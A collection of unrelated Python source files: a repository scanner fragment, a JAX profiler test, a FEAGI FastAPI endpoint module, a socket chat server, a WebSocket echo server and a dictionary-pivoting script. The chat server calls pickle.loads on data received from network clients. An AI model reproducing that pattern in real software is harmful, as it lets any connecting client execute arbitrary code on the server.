repository = Repository(repo_url, repo_dir, name=repo_name, add_date=add_time,
install_date=add_time, last_update_date=add_time)
msg.Prints.verbose("{} is going to be added".format(repository.__str__(True)), vrb)
if not any(t.get_name() == repository.get_name() for t in cfg.get_tools()):
cfg.add_tool(repository)
msg.Prints.success("{} successfully added".format(repository.get_name()))
else:
msg.Prints.warning("{} has already been added. Skipping...".format(repository.get_name()))
msg.Prints.verbose("All repositories have been added", vrb)
msg.Prints.verbose("Proceed to save new configurations", vrb)
cfg.save()
msg.Prints.verbose("Configurations saved", vrb)
msg.Prints.verbose("tman scan execution completed", vrb)
sys.exit(0)
def _repo_seeker(root_dir: str, repo_list: list) -> None:
"""
Search repositories from root_dir.
NOTE: THIS FUNCTION IS CALLED WITHIN A THREAD
:param str root_dir: root directory where to start the scan
:param list repo_list: repository list to populate
:return: None
"""
pattern = ".git"
    for root, dirs, _files in os.walk(root_dir):
for d in dirs:
if fnmatch.fnmatch(d, pattern):
repo_list.append(root)
def _animated_loading() -> None:
"""
Print a loading statement while searching for repositories.
:return: None
"""
chars = "/—\\|"
for char in chars:
sys.stdout.write("\r" + char + " searching...")
time.sleep(.1)
sys.stdout.flush()
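# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): driving the seeker
# thread directly, mirroring the thread setup inside scan() above.  The root
# directory is an assumption supplied by the caller.
def _example_repo_seek(root_dir: str) -> list:
    found = []
    seeker = threading.Thread(name="repo_search", target=_repo_seeker, args=(root_dir, found))
    seeker.daemon = True
    seeker.start()
    seeker.join()  # block until the whole tree has been walked
    return found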
|
profiler_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import glob
import os
import shutil
import threading
import unittest
from absl.testing import absltest
import jax
import jax.numpy as jnp
import jax.profiler
from jax.config import config
import jax.test_util as jtu
try:
import portpicker
except ImportError:
portpicker = None
try:
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as tf_profiler
except ImportError:
profiler_client = None
tf_profiler = None
config.parse_flags_with_absl()
class ProfilerTest(unittest.TestCase):
# These tests simply test that the profiler API does not crash; they do not
# check functional correctness.
def setUp(self):
super().setUp()
self.worker_start = threading.Event()
self.profile_done = False
@unittest.skipIf(not portpicker, "Test requires portpicker")
def testStartServer(self):
port = portpicker.pick_unused_port()
jax.profiler.start_server(port=port)
del port
def testTraceContext(self):
x = 3
with jax.profiler.TraceContext("mycontext"):
x = x + 2
def testTraceFunction(self):
@jax.profiler.trace_function
def f(x):
return x + 2
self.assertEqual(f(7), 9)
@partial(jax.profiler.trace_function, name="aname")
def g(x):
return x + 2
self.assertEqual(g(7), 9)
@partial(jax.profiler.trace_function, name="aname", akwarg="hello")
def h(x):
return x + 2
self.assertEqual(h(7), 9)
def testDeviceMemoryProfile(self):
x = jnp.ones((20,)) + 7.
self.assertIsInstance(jax.profiler.device_memory_profile(), bytes)
del x
def _check_xspace_pb_exist(self, logdir):
path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
@unittest.skipIf(not (portpicker and profiler_client and tf_profiler),
"Test requires tensorflow.profiler and portpicker")
def testSingleWorkerSamplingMode(self, delay_ms=None):
def on_worker(port, worker_start):
# Must keep return value `server` around.
server = jax.profiler.start_server(port) # noqa: F841
worker_start.set()
x = jnp.ones((1000, 1000))
while True:
with jax.profiler.TraceContext("atracecontext"):
jnp.dot(x, x.T).block_until_ready()
if self.profile_done:
break
def on_profile(port, logdir, worker_start):
worker_start.wait()
options = tf_profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=2,
device_tracer_level=1,
delay_ms=delay_ms,
)
# Request for 1000 milliseconds of profile.
duration_ms = 1000
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 1000, options)
self.profile_done = True
logdir = absltest.get_default_test_tmpdir()
# Remove any existing log files.
shutil.rmtree(logdir, ignore_errors=True)
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(
target=on_profile, args=(port, logdir, self.worker_start))
thread_worker = threading.Thread(
target=on_worker, args=(port, self.worker_start))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_xspace_pb_exist(logdir)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
api.py
|
# Copyright 2016-2022 The FEAGI Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import requests
from fastapi import FastAPI, File, UploadFile
from fastapi.staticfiles import StaticFiles
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel
from typing import Optional
from ast import literal_eval
from threading import Thread
from queue import Queue
from inf.feagi import *
from inf import disk_ops, runtime_data
from inf.baseline import gui_baseline
from inf.initialize import init_parameters
from evo import static_genome
init_parameters()
app = FastAPI()
favicon_path = 'favicon.svg'
api_queue = Queue()
ORIGINS = [
"http://localhost:6080",
"http://localhost:6081",
"http://localhost:3000"
]
app.add_middleware(
CORSMiddleware,
allow_origins=ORIGINS,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
class Launch(BaseModel):
existing_connectome: Optional[str] = ''
class Logs(BaseModel):
print_burst_info: Optional[bool]
print_messenger_logs: Optional[bool]
print_brain_gen_activities: Optional[bool]
class BurstEngine(BaseModel):
burst_duration: Optional[float]
class Network(BaseModel):
godot_host: Optional[str] = runtime_data.parameters['Sockets']['godot_host_name']
godot_data_port: Optional[int] = runtime_data.parameters['Sockets']['feagi_inbound_port_godot']
godot_web_port: Optional[int] = 6081
gazebo_host: Optional[str] = runtime_data.parameters['Sockets']['gazebo_host_name']
gazebo_data_port: Optional[int] = runtime_data.parameters['Sockets']['feagi_inbound_port_gazebo']
gazebo_web_port: Optional[int] = 6080
virtual_stimulator_host: Optional[str] = runtime_data.parameters['Sockets']['virtual_host_name']
virtual_stimulator_data_port: Optional[int] = runtime_data.parameters['Sockets']['feagi_inbound_port_virtual']
class ConnectomePath(BaseModel):
connectome_path: str
class Registration(BaseModel):
source: str
host: str
capabilities: dict
class Stats(BaseModel):
neuron_stat_collection: Optional[bool] = False
synapse_stat_collection: Optional[bool] = False
class Genome(BaseModel):
genome: dict
class SPAStaticFiles(StaticFiles):
async def get_response(self, path: str, scope):
response = await super().get_response(path, scope)
print("<><><><><><>")
if response.status_code == 404:
print("-=-=-=-=-=-=-=-=-=-=")
response = await super().get_response('.', scope)
return response
app.mount("/home", SPAStaticFiles(directory="gui", html=True), name="static")
# @app.api_route("/v1/feagi/feagi/launch", methods=['POST'])
# async def feagi_management():
# try:
# print("message:", message)
# connectome_overwrite_path = message.existing_connectome
# feagi_thread = Thread(target=start_feagi, args=(api_queue, connectome_overwrite_path,))
# feagi_thread.start()
#
# if message.existing_connectome:
# return {"FEAGI started using an existing connectome."}
# else:
# return {"FEAGI started using a genome."}
# except Exception as e:
# return {"FEAGI start failed ... error details to be provided here", e}
@app.api_route("/v1/feagi/feagi/register", methods=['POST'])
async def feagi_registration(message: Registration):
try:
message = message.dict()
source = message['source']
host = message['host']
capabilities = message['capabilities']
print("########## ###### >>>>>> >>>> ", source, host, capabilities)
return {"Registration was successful"}
except Exception as e:
return {"FEAGI start failed ... error details to be provided here", e}
@app.api_route("/v1/feagi/feagi/logs", methods=['POST'])
async def log_management(message: Logs):
try:
message = message.dict()
message = {"log_management": message}
api_queue.put(item=message)
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/burst_engine/stimulation_period", methods=['GET'])
async def burst_engine_params():
try:
return runtime_data.burst_timer
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/ipu", methods=['GET'])
async def supported_ipu_list():
try:
return gui_baseline['ipu']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/opu", methods=['GET'])
async def supported_opu_list():
try:
return gui_baseline['opu']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/morphology", methods=['GET'])
async def supported_morphology_list():
try:
return gui_baseline['morphology']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/cortical-genes", methods=['GET'])
async def supported_cortical_genes_list():
try:
return gui_baseline['cortical_genes']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/morphology-scalar", methods=['GET'])
async def supported_morphology_scalar_list():
try:
return gui_baseline['morphology_scalar']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/psc-multiplier", methods=['GET'])
async def supported_psc_multiplier_list():
try:
return gui_baseline['postSynapticCurrent_multiplier']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/gui_baseline/plasticity-flag", methods=['GET'])
async def supported_plasticity_flag_list():
try:
return gui_baseline['plasticity_flag']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/pns/ipu", methods=['GET'])
async def ipu_list():
try:
return runtime_data.ipu_list
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/pns/opu", methods=['GET'])
async def opu_list():
try:
return runtime_data.opu_list
except Exception as e:
return {"Request failed...", e}
# ###### Burst-Engine Endpoints #########
# ##################################
@app.api_route("/v1/feagi/feagi/burst_engine/burst_counter", methods=['GET'])
async def burst_engine_params():
try:
return runtime_data.burst_count
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/burst_engine", methods=['POST'])
async def burst_management(message: BurstEngine):
try:
message = message.dict()
message = {'burst_management': message}
api_queue.put(item=message)
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
# ###### Networking Endpoints #########
# ##################################
@app.api_route("/v1/feagi/feagi/network", methods=['GET'])
async def network_management():
try:
return runtime_data.parameters['Sockets']
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/feagi/network", methods=['POST'])
async def network_management(message: Network):
try:
message = message.dict()
message = {'network_management': message}
api_queue.put(item=message)
return runtime_data.parameters['Sockets']
except Exception as e:
return {"Request failed...", e}
# ###### Connectome Endpoints #########
# ##################################
@app.post("/v1/feagi/connectome/upload")
async def connectome_file_upload(file: UploadFile = File(...)):
try:
data = await file.read()
connectome_str = data.decode("utf-8").split(" = ")[1]
connectome = literal_eval(connectome_str)
message = {"connectome": connectome}
api_queue.put(item=message)
return {"Connectome received as a file"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/connectome/source", methods=['POST'])
async def connectome_source_path(connectome_path: ConnectomePath):
try:
feagi_thread = Thread(target=start_feagi, args=(api_queue, 'connectome', 'path', connectome_path,))
feagi_thread.start()
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/connectome/snapshot", methods=['POST'])
async def connectome_snapshot(message: ConnectomePath):
try:
message = message.dict()
message = {'connectome_snapshot': message}
print("Snapshot path:", message)
api_queue.put(item=message)
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/connectome/properties/dimensions", methods=['GET'])
async def connectome_report():
print("cortical_dimensions", runtime_data.cortical_dimensions)
try:
return runtime_data.cortical_dimensions
except Exception as e:
return {"Request failed...", e}
# ###### Genome Endpoints #########
# ##################################
@app.post("/v1/feagi/genome/upload/file")
async def genome_file_upload(file: UploadFile = File(...)):
try:
data = await file.read()
genome_str = data.decode("utf-8").split(" = ")[1]
genome = literal_eval(genome_str)
feagi_thread = Thread(target=start_feagi, args=(api_queue, 'genome', '', genome,))
feagi_thread.start()
return {"Genome received as a file"}
except Exception as e:
return {"Request failed...", e}
@app.api_route("/v1/feagi/genome/upload/default", methods=['POST'])
async def genome_default_upload():
try:
genome = static_genome.genome
print("default_genome", genome)
feagi_thread = Thread(target=start_feagi, args=(api_queue, 'genome', '', genome,))
feagi_thread.start()
return {"FEAGI started using a genome string."}
except Exception as e:
return {"FEAGI start using genome string failed ...", e}
@app.api_route("/v1/feagi/genome/upload/string", methods=['POST'])
async def genome_string_upload(genome: Genome):
try:
feagi_thread = Thread(target=start_feagi, args=(api_queue, 'genome', '', genome.genome,))
feagi_thread.start()
return {"FEAGI started using a genome string."}
except Exception as e:
return {"FEAGI start using genome string failed ...", e}
# ###### Statistics and Reporting Endpoints #########
# ##################################
@app.api_route("/v1/feagi/stats", methods=['POST'])
async def stat_management(message: Stats):
try:
message = message.dict()
message = {'stats': message}
api_queue.put(item=message)
return {"Request sent!"}
except Exception as e:
return {"Request failed...", e}
def api_message_processor(api_message):
"""
Processes the incoming API calls to FEAGI
"""
if 'burst_management' in api_message:
if 'burst_duration' in api_message['burst_management']:
if api_message['burst_management']['burst_duration'] is not None:
runtime_data.burst_timer = api_message['burst_management']['burst_duration']
if 'log_management' in api_message:
if 'print_burst_info' in api_message['log_management']:
runtime_data.parameters['Logs']['print_burst_info'] \
= api_message['log_management']['print_burst_info']
if 'print_messenger_logs' in api_message['log_management']:
runtime_data.parameters['Logs']['print_messenger_logs'] \
= api_message['log_management']['print_messenger_logs']
if 'connectome_snapshot' in api_message:
if 'connectome_path' in api_message['connectome_snapshot']:
if api_message['connectome_snapshot']['connectome_path']:
print("Taking a snapshot of the brain... ... ...")
disk_ops.save_brain_to_disk(connectome_path=api_message['connectome_snapshot']['connectome_path'],
type='snapshot')
else:
disk_ops.save_brain_to_disk()
if 'stats' in api_message:
if 'neuron_stat_collection' in api_message['stats'] and \
api_message['stats']['neuron_stat_collection'] is not None:
if api_message['stats']['neuron_stat_collection']:
runtime_data.collect_neuron_stats = True
print("Starting to capture neuronal activity stats into database...")
else:
runtime_data.collect_neuron_stats = False
print("Stopping the capture of neuronal activity stats into database.")
if 'synapse_stat_collection' in api_message['stats'] and \
api_message['stats']['synapse_stat_collection'] is not None:
if api_message['stats']['synapse_stat_collection']:
runtime_data.collect_synapse_stats = True
print("Starting to capture synaptic activity stats into database...")
else:
runtime_data.collect_synapse_stats = False
print("Stopping the capture of synaptic activity stats into database.")
if 'network_management' in api_message:
print("api_message", api_message)
if 'godot_host' in api_message['network_management']:
runtime_data.parameters['Sockets']['godot_host_name'] = api_message['network_management']['godot_host']
if 'godot_port' in api_message['network_management']:
runtime_data.parameters['Sockets']['feagi_inbound_port_godot'] = \
api_message['network_management']['godot_port']
if 'gazebo_host' in api_message['network_management']:
runtime_data.parameters['Sockets']['gazebo_host_name'] = api_message['network_management']['gazebo_host']
if 'gazebo_port' in api_message['network_management']:
runtime_data.parameters['Sockets']['feagi_inbound_port_gazebo'] = \
api_message['network_management']['gazebo_port']
if 'virtual_host' in api_message['network_management']:
runtime_data.parameters['Sockets']['virtual_host_name'] = api_message['network_management'][
'virtual_host']
if 'virtual_port' in api_message['network_management']:
runtime_data.parameters['Sockets']['feagi_inbound_port_virtual'] = \
api_message['network_management']['virtual_port']
# if 'genome' in api_message:
# pass
# todo: Handle web port assignments
|
server.py
|
"""
Server recebe novas conexoes de usuarios a qualquer momento.
Tambem fica responsavel pela parte do processamento de listar os usuarios ativos
"""
from constants import CMD_CHAT, CMD_LIST_USERS, CMD_QUIT, SERVER_NAME, SERVER_PORT
import sys
import socket
import threading
import select as s
from datetime import datetime
import pickle
from message import Message
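# Judging by the constructor calls below, Message appears to take
# (sender, receiver, content, timestamp); the class itself is defined in
# message.py and is not shown here.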
HOST = ''
# Inputs watched by select
entry_points = [sys.stdin]
# Map of connections to the server
connections = {}
# Lock guarding access to the connections dictionary
lock = threading.Lock()
# Map of username to socket
usernames = dict()
def initServer():
"""Inicia o socket: internet IPv4 + TCP"""
# Default: socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sckt = socket.socket() # Descritor socket
sckt.bind((HOST, SERVER_PORT))
sckt.listen(10)
# Medida preventiva contra falhas entre a chamada de s.select() e sckt.accept()
sckt.setblocking(False)
return sckt
def acceptConnection(sckt):
"""Aceita a conexao com o cliente"""
global usernames
newSckt, address = sckt.accept()
while True:
data = newSckt.recv(1024)
message: Message = pickle.loads(data)
new_username = message.content
if new_username not in usernames.keys() and new_username != SERVER_NAME:
lock.acquire()
usernames[message.content] = newSckt
lock.release()
response = Message(SERVER_NAME, new_username, True, datetime.now())
newSckt.send(pickle.dumps(response))
break
else:
response = Message(SERVER_NAME, None, False, datetime.now())
newSckt.send(pickle.dumps(response))
    welcome_msg = Message(SERVER_NAME, message.content,
                          f'Welcome {message.content}! Here is the list of available users: {list(usernames.keys())}\n'
                          f'To start a chat, just type "{CMD_CHAT} <USER_NAME>"', datetime.now())
    newSckt.send(pickle.dumps(welcome_msg))
    print(f'Connected to: {str(address)}, username: {message.content}')  # Log the connection from address <address>
return newSckt, address
def internalCommandHandler(cmd: str, sckt, clients: list):
if cmd == CMD_QUIT:
        print('!-----NOTICE-----!')
        print('The server is closed to new connections. Waiting for clients to disconnect...')
sckt.close()
sys.exit()
elif cmd in CMD_LIST_USERS:
pass #user_list = listActiveUsers()
def requestHandler(cliSckt, address):
"""Recebe requests dos clientes conectados"""
# Recebe uma mensagem
# se o receiver for SERVER, então é um comando. tem que tratar
# se o receiver for outro, então é uma mensagem pra alguém. acessa o map de user e redireciona
while True:
data = cliSckt.recv(1024)
        # If the user terminated unexpectedly
        if not data:
            sender = list(usernames.keys())[list(usernames.values()).index(cliSckt)]
            print(f'User {sender} disconnected unexpectedly.')
lock.acquire()
usernames.pop(sender)
lock.release()
cliSckt.close()
break
message: Message = pickle.loads(data)
if message.receiver == 'SERVER':
if message.content in CMD_LIST_USERS:
response = Message('SERVER', message.sender, list(usernames.keys()), datetime.now())
usernames[message.sender].send(pickle.dumps(response))
                print(f'User list sent to {message.sender}')
elif message.content == CMD_QUIT:
                # Ensure the server can send the ack after deleting the client's records
                sender = message.sender
                sender_sock = usernames[sender]
                # Send an acknowledgement so the client can disconnect: 200 = OK, 500 = Error
                lock.acquire()
                if usernames.pop(sender, False):
                    print(f'User {message.sender} disconnected successfully.')
lock.release()
response = Message('SERVER', sender, '200', datetime.now())
sender_sock.send(pickle.dumps(response))
cliSckt.close()
break
else:
lock.release()
response = Message('SERVER', sender, '500', datetime.now())
sender_sock.send(pickle.dumps(response))
else:
if message.receiver not in usernames.keys():
                response = Message(SERVER_NAME, message.sender,
                                   f'User {message.receiver} does not exist or is inactive.', datetime.now())
cliSckt.send(pickle.dumps(response))
else:
addressee_sock = usernames[message.receiver]
addressee_sock.send(data)
def main():
sckt = None
try:
sckt = initServer()
        print('Ready to accept connections...')
        print(f'To shut down the service, type "{CMD_QUIT}".')
        entry_points.append(sckt)
        # List of active threads
client_threads = []
while True:
r, w, x = s.select(entry_points, [], [])
for ready in r:
if ready == sckt:
                    # Accept the connection
                    client_sckt, client_addr = acceptConnection(sckt)
                    # Create the new thread that will handle the connection
                    client = threading.Thread(target=requestHandler, args=(client_sckt, client_addr))
                    client.start()
                    # Add the new thread to the list of active threads
                    client_threads.append(client)
                    # Protect against problematic concurrent modifications
                    lock.acquire()
                    connections[client_sckt] = client_addr  # Add the new connection to the connections map
                    lock.release()
                elif ready == sys.stdin:
                    # Allow interaction with the server
cmd = input()
internalCommandHandler(cmd, sckt, client_threads)
except socket.error as e:
        print('Error: %s' % e)
sys.exit()
finally:
if sckt:
sckt.close()
pass
if __name__ == "__main__":
main()
|
main.py
|
import socket
import threading
import ws
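# 'ws' is assumed to be a local helper module that provides ws.handle(conn,
# on_connect, on_recv, on_close) for the WebSocket handshake/receive loop and
# ws.send() for replies; it is not part of the standard library.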
def connect():
print("Connect")
def recv(dt):
print(f"Echo: {dt}")
ws.send(f"Echo: {dt}")
def disconnect():
print("Close")
try:
cfg=socket.getaddrinfo("0.0.0.0",8080,0,socket.SOCK_STREAM,socket.IPPROTO_TCP,socket.AI_PASSIVE)[0]
ss=socket.socket(cfg[0],cfg[1],cfg[2])
ss.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
ss.bind(cfg[4])
ss.listen(5)
print("WS Server Started on Port 8080!")
while (True):
cs,a=ss.accept()
threading.Thread(target=ws.handle,args=(cs,connect,recv,disconnect)).start()
except KeyboardInterrupt:
    ss.close()
|
pivot_apertium.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
PivotAlign: A system for inducing bilingual dictionaries
from parallel texts and pre-existing dictionaries for other language pairs.
Script for pivoting through the Apertium dictionaries to create a candidate list
Copyright (C) 2021 Steinþór Steingrímsson.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__license__ = "Apache 2.0"
#TODO: Some adaption unfinished for final published version.
# Get translations sets through pivoting
# Pairs: en/fr fr/pt pt/en
# One pivot for en/fr:
# en/eo - eo/fr; en-es - es/fr; en/ca - ca/fr
import multiprocessing
import sys
from os import path
import itertools
import os
import time
from collections import Counter
from queue import Queue, Empty
from threading import Thread
from threading import Lock
from multiprocessing import Process, Manager
transset_folder = "/home/steinst/tiad2021/"
dict_of_dicts = Manager().dict()
dict_of_lists = {}
syn_ratio_threshold = 0.4
synonyms = {}
## Build a loop that goes through all the pairs
## Once all the pairs are in, pivot through the final pairs
## Then write out the results (with the POS tag as well)
##
## Accept all proper nouns? score=1? (or score = 1 where they are written exactly the same)
## accept all alignments that are found and assign them a score
## if one side is an MWE, grep the large parallel file and accept what is found: score=1
pathway = sys.argv[1]
addsynonym = int(sys.argv[2])
pos_dict = {}
accepted_dict = {}
suggestions_dict = {}
def create_pair_dict(src, trg):
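    # Assumed TransSet CSV layout, inferred from the indexing below: fields are
    # separated by '" , "', with field 0 the source written representation,
    # field 1 the source entry id, field 5 the target entry id, field 6 the
    # target written representation and field 7 the part-of-speech tag.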
src_trg_dict = {}
trg_src_dict = {}
src_list = []
trg_list = []
pair_name = 'TransSet' + src.upper() + '-' + trg.upper() + '.csv'
if not path.exists(transset_folder + pair_name):
pair_name = 'TransSet' + trg.upper() + '-' + src.upper() + '.csv'
with open(transset_folder + pair_name, 'r') as pair_in:
for line in pair_in:
if not line.lstrip().startswith('"written_rep_a"'):
try:
line_list = line.strip().split('" , "')
src_rep = line_list[0].lstrip('"')
trg_rep = line_list[6]
src_entry = line_list[1] + '__' + src_rep
trg_entry = line_list[5] + '__' + trg_rep
POS = line_list[7].strip().strip(" ,")
pos_dict[src_entry] = POS
pos_dict[trg_entry] = POS
src_list.append(src_entry)
trg_list.append(trg_entry)
if src_entry in src_trg_dict.keys():
src_trg_dict[src_entry].append([src_rep, trg_entry, trg_rep, POS])
else:
src_trg_dict[src_entry] = [[src_rep, trg_entry, trg_rep, POS]]
if trg_entry in trg_src_dict.keys():
trg_src_dict[trg_entry].append([trg_rep, src_entry, src_rep, POS])
else:
trg_src_dict[trg_entry] = [[trg_rep, src_entry, src_rep, POS]]
except Exception as e:
pass
src_list = list(set(src_list))
trg_list = list(set(trg_list))
return src_trg_dict, trg_src_dict, src_list, trg_list
def pivot(*pairs):
first_dict = True
out_dict = {}
for pair in pairs:
if first_dict:
previous_dict = dict_of_dicts[pair]
out_dict = previous_dict.copy()
first_dict = False
else:
working_dict = dict_of_dicts[pair]
out_dict = {}
for key in previous_dict.keys():
trans_list = previous_dict[key]
for t in trans_list:
translation = t[1]
try:
#print(translation)
pivot_translation = working_dict[translation]
for pt in pivot_translation:
if key in out_dict.keys():
out_dict[key].append(pt)
else:
out_dict[key] = [pt]
except:
pass
previous_dict = out_dict.copy()
return out_dict
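# Illustrative use: pivot('en_es', 'es_fr') chains the en->es and es->fr pair
# dictionaries into candidate en->fr translations; the actual pivot chains are
# supplied via path_dict / pivots_path_dict in the __main__ block below.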
def pivot_path(path_dict):
pivot_paths = path_dict.keys()
for pivots in pivot_paths:
print('pivoting ' + pivots)
src_lang, trg_lang = pivots.split('_')
out_list = []
for curr_pivot in path_dict[pivots]:
curr_dict = pivot(*curr_pivot)
for key in curr_dict.keys():
translations = curr_dict[key]
for i in translations:
word = key.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + key + '\t' + i[1] + '\t' + i[3] + '\n')
out_list = list(set(out_list))
try:
temp_src = dict_of_dicts[src_lang + '_' + trg_lang].copy()
except:
temp_src = {}
try:
temp_trg = dict_of_dicts[trg_lang + '_' + src_lang].copy()
except:
temp_trg = {}
for i in out_list:
src_rep, trg_rep, src_entry, trg_entry, POS = i.strip().split('\t')
src_key = src_entry # + '__' + src_rep
trg_key = trg_entry # + '__' + trg_rep
if src_key in temp_src.keys():
temp_src[src_key].append([src_rep, trg_entry, trg_rep, POS])
temp_src[src_key].sort()
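                # sort + itertools.groupby de-duplicates the list of translation
                # entries (they are lists, hence unhashable, so set() cannot be used)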
temp_src[src_key] = list(temp_src[src_key] for temp_src[src_key], _ in itertools.groupby(temp_src[src_key]))
else:
temp_src[src_key] = [[src_rep, trg_entry, trg_rep, POS]]
if trg_key in temp_trg.keys():
temp_trg[trg_key].append([trg_rep, src_entry, src_rep, POS])
temp_trg[trg_key].sort()
temp_trg[trg_key] = list(temp_trg[trg_key] for temp_trg[trg_key],_ in itertools.groupby(temp_trg[trg_key]))
else:
temp_trg[trg_key] = [[trg_rep, src_entry, src_rep, POS]]
dict_of_dicts[src_lang + '_' + trg_lang] = temp_src.copy()
dict_of_dicts[trg_lang + '_' + src_lang] = temp_trg.copy()
def pivot_path_dict():
# Add synonym lookup
while True:
try:
pivots, path_dict = q.get()
print('pivoting ' + pivots)
src_lang, trg_lang = pivots.split('_')
out_list = []
for curr_pivot in path_dict[pivots]:
print(curr_pivot)
curr_dict = pivot(*curr_pivot)
for key in curr_dict.keys():
translations = curr_dict[key]
for i in translations:
word = key.split('__')[1]
out_list.append(
word + '\t' + i[2] + '\t' + key + '\t' + i[1] + '\t' + i[3] + '\n')
if addsynonym > 0:
try:
trans_syns = synonyms[i[1]]
for j in trans_syns:
if pos_dict[j] == pos_dict[key]:
word = j.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + j + '\t' + i[1] + '\t' + pos_dict[j] + '\n')
except:
pass
try:
source_syns = synonyms[key]
for j in source_syns:
if pos_dict[j] == pos_dict[key]:
word = j.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + j + '\t' + i[1] + '\t' + pos_dict[j] + '\n')
except:
pass
out_list = list(set(out_list))
try:
temp_src = dict_of_dicts[src_lang + '_' + trg_lang].copy()
except:
temp_src = {}
try:
temp_trg = dict_of_dicts[trg_lang + '_' + src_lang].copy()
except:
temp_trg = {}
for i in out_list:
src_rep, trg_rep, src_entry, trg_entry, POS = i.strip().split('\t')
src_key = src_entry #+ '__' + src_rep
trg_key = trg_entry #+ '__' + trg_rep
if src_key in temp_src.keys():
temp_src[src_key].append([src_rep, trg_entry, trg_rep, POS])
#temp_src[src_key] = list(set(temp_src[src_key]))
temp_src[src_key].sort()
temp_src[src_key] = list(temp_src[src_key] for temp_src[src_key], _ in itertools.groupby(temp_src[src_key]))
else:
temp_src[src_key] = [[src_rep, trg_entry, trg_rep, POS]]
if trg_key in temp_trg.keys():
temp_trg[trg_key].append([trg_rep, src_entry, src_rep, POS])
#temp_trg[trg_key] = list(set(temp_trg[trg_key]))
temp_trg[trg_key].sort()
temp_trg[trg_key] = list(temp_trg[trg_key] for temp_trg[trg_key], _ in itertools.groupby(temp_trg[trg_key]))
else:
temp_trg[trg_key] = [[trg_rep, src_entry, src_rep, POS]]
dict_of_dicts[src_lang + '_' + trg_lang] = temp_src.copy()
dict_of_dicts[trg_lang + '_' + src_lang] = temp_trg.copy()
q.task_done()
        except Empty:
return
def get_lang_words(lang, *pairs):
all_words_out = []
for i in pairs:
src, trg = i
pair_name = 'TransSet' + src.upper() + '-' + trg.upper() + '.csv'
with open(transset_folder + pair_name, 'r') as pair_in:
for line in pair_in:
if not line.startswith('"written_rep_a"'):
try:
line_list = line.strip().split('" , "')
src_rep = line_list[0].lstrip('"')
trg_rep = line_list[6]
src_entry = line_list[1]
trg_entry = line_list[5]
if lang == src:
all_words_out.append(src_entry)
else:
all_words_out.append(trg_entry)
except:
pass
return all_words_out
def work_pair(p, dict_of_dicts):
try:
dict_a, dict_b, list_a, list_b = create_pair_dict(p[0], p[1])
dict_of_dicts[p[0] + '_' + p[1]] = dict_a.copy()
dict_of_dicts[p[1] + '_' + p[0]] = dict_b.copy()
for a in list_a:
try:
dict_of_lists[p[0]].append(a)
except:
dict_of_lists[p[0]] = [a]
dict_of_lists[p[0]] = list(set(dict_of_lists[p[0]]))
for b in list_b:
try:
dict_of_lists[p[1]].append(b)
except:
dict_of_lists[p[1]] = [b]
dict_of_lists[p[1]] = list(set(dict_of_lists[p[1]]))
return
except Exception as e:
print(e)
return
def att_otac(p, dict_of_dicts):
try:
otac_ctr = 0
src_w = p[0]
trg_w = p[1]
o_pairs = pairs.copy()
for o in o_pairs:
if o[0] == src_w:
s_i = o[0] + '_' + o[1]
